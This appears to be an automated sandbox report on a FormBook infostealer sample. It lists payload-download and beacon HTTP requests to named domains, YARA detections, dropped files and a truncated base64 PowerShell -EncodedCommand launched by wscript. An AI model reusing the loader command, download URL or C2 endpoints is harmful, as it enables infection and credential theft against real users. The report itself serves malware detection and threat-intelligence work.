73 30 51 67 6b 71 48 69 38 4e 69 35 71 66 6b 35 52 62 4e 77 30 31 73 42 33 55 45 64 62 31 38 41 32 2d 51 6f 4a 42 68 5f 6f 35 52 6e 44 41 59 73 77 75 77 57 39 31 50 63 38 55 6a 53 36 78 4e 4b 34 43 4c 45 6e 68 30 6a 42 34 62 6e 41 4a 32 4b 7e 6c 6f 49 69 70 4e 59 35 6e 72 78 57 74 55 45 79 66 46 2d 71 37 32 65 50 75 66 39 35 48 34 51 7e 47 45 37 66 4b 78 76 42 78 4c 44 52 45 77 41 62 5f 69 2d 7e 62 37 30 38 57 6a 78 5a 2d 78 4a 59 6b 33 44 48 64 38 49 4a 67 6a 42 4d 4f 35 49 56 37 4c 48 79 37 4c 34 30 4a 67 42 50 7a 34 4f 53 43 77 33 58 73 66 73 56 75 58 67 50 4a 43 2d 69 76 30 31 63 68 62 34 54 62 77 58 49 59 6b 5f 6e 67 34 38 69 65 73 41 39 58 57 78 76 36 6e 58 70 30 62 45 32 59 4f 72 7a 58 62 56 56 77 66 59 6a 68 45 6d 33 54 6b 77 4f 66 31 45 72 79 56 38 7e 4b 54 44 5a 79 42 6c 6a 43 66 65 77 5a 50 4a 35 5a 34 65 39 6c 78 42 75 43 48 61 62 55 56 33 56 74 65 4c 76 64 55 61 63 47 41 4c 42 39 63 63 75 46 63 2d 63 5a 74 69 6a 79 4b 61 66 49 31 73 4b 39 30 71 69 78 75 46 5a 69 74 5f 33 53 55 4f 6b 4f 77 38 30 42 71 30 61 49 72 58 77 4e 75 4a 34 56 56 2d 37 4f 47 51 7a 30 4c 35 50 71 39 4d 47 6e 4f 69 58 49 61 75 56 4a 67 36 79 32 46 33 49 4f 77 41 41
Source: unknown DNS traffic detected: queries for: barsam.com.au
Source: global traffic HTTP traffic detected: GET /bin_FCWtLoO90.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: barsam.com.auCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=A9tPw5wW+2gVzhiAst2uEYMxl8Qbhtbs4UZqv+cXLFe4/YHx2PgN7R7cqpKWqQ64E5aF&Vb3pDf=BHT0MRp HTTP/1.1Host: www.borneadomicile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=q67zoIOMf4+mO4D8EIqIf3d7IvOeBQOSx5x5Cm6B2nNhbRkYSectWIWbwYJ7UqoIixMy&Vb3pDf=BHT0MRp HTTP/1.1Host: www.clickleaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=VPEU4GtrlSiNcAkb3jQiBQiB6wsnkRv+1lt8CI/dwo4hrc1cBv2ecJ2q6A5CexHOXEVq&Vb3pDf=BHT0MRp HTTP/1.1Host: www.schnellekreditfinanz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=rBunXcp5a8HG2eTY65iWvy6khmWv9on3XutAN+/kdojtSOLKRRt/04yNs8WYDZYu6HpH&Vb3pDf=BHT0MRp HTTP/1.1Host: www.repaircilinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /wn19/?AVnXAh=041CpAoA8aE4nytHYFLnZX+bZp2z2B9kFJxelKlpXP3rI73HFbKkzWSC2hacigUxO+LM&Vb3pDf=BHT0MRp HTTP/1.1Host: www.linqxw.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Detected FormBook malware
Source: C:\Windows\SysWOW64\chkdsk.exe Dropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogri.ini Jump to dropped file
Source: C:\Windows\SysWOW64\chkdsk.exe Dropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrv.ini Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe Dropped file: C:\Users\user\AppData\Roaming\2LMM06TC\2LMlogrf.ini Jump to dropped file
Malicious sample detected (through community Yara rule)
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg Jump to behavior
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 16636
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 16636 Jump to behavior
Yara signature match
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F19000 13_2_04F19000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F1E7EF 13_2_04F1E7EF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F18FF2 13_2_04F18FF2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F18FA8 13_2_04F18FA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_04F1E820 13_2_04F1E820
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0835E830 13_2_0835E830
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08356A50 13_2_08356A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08356A50 13_2_08356A50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08355430 13_2_08355430
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_0836EC40 13_2_0836EC40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_08367358 13_2_08367358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC2EE8 27_2_1EFC2EE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD1EB2 27_2_1EFD1EB2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08FF63 27_2_1F08FF63
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF0E50 27_2_1EFF0E50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08EFBF 27_2_1F08EFBF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F081FC6 27_2_1F081FC6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD6FE0 27_2_1EFD6FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F012E48 27_2_1F012E48
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F070E6D 27_2_1F070E6D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F080EAD 27_2_1F080EAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F089ED2 27_2_1F089ED2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFDCF00 27_2_1EFDCF00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEFCE0 27_2_1EFEFCE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFE8CDF 27_2_1EFE8CDF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08FD27 27_2_1F08FD27
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F087D4C 27_2_1F087D4C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD3C60 27_2_1EFD3C60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC0C12 27_2_1EFC0C12
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F06FDF4 27_2_1F06FDF4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F04EC20 27_2_1F04EC20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD9DD0 27_2_1EFD9DD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07EC4C 27_2_1F07EC4C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFE2DB0 27_2_1EFE2DB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F086C69 27_2_1F086C69
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08EC60 27_2_1F08EC60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD0D69 27_2_1EFD0D69
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F069C98 27_2_1F069C98
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F09ACEB 27_2_1F09ACEB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F057CE8 27_2_1F057CE8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCAD00 27_2_1EFCAD00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F00DB19 27_2_1F00DB19
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08FB2E 27_2_1F08FB2E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEFAA0 27_2_1EFEFAA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F044BC0 27_2_1F044BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08CA13 27_2_1F08CA13
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08EA5B 27_2_1F08EA5B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08FA89 27_2_1F08FA89
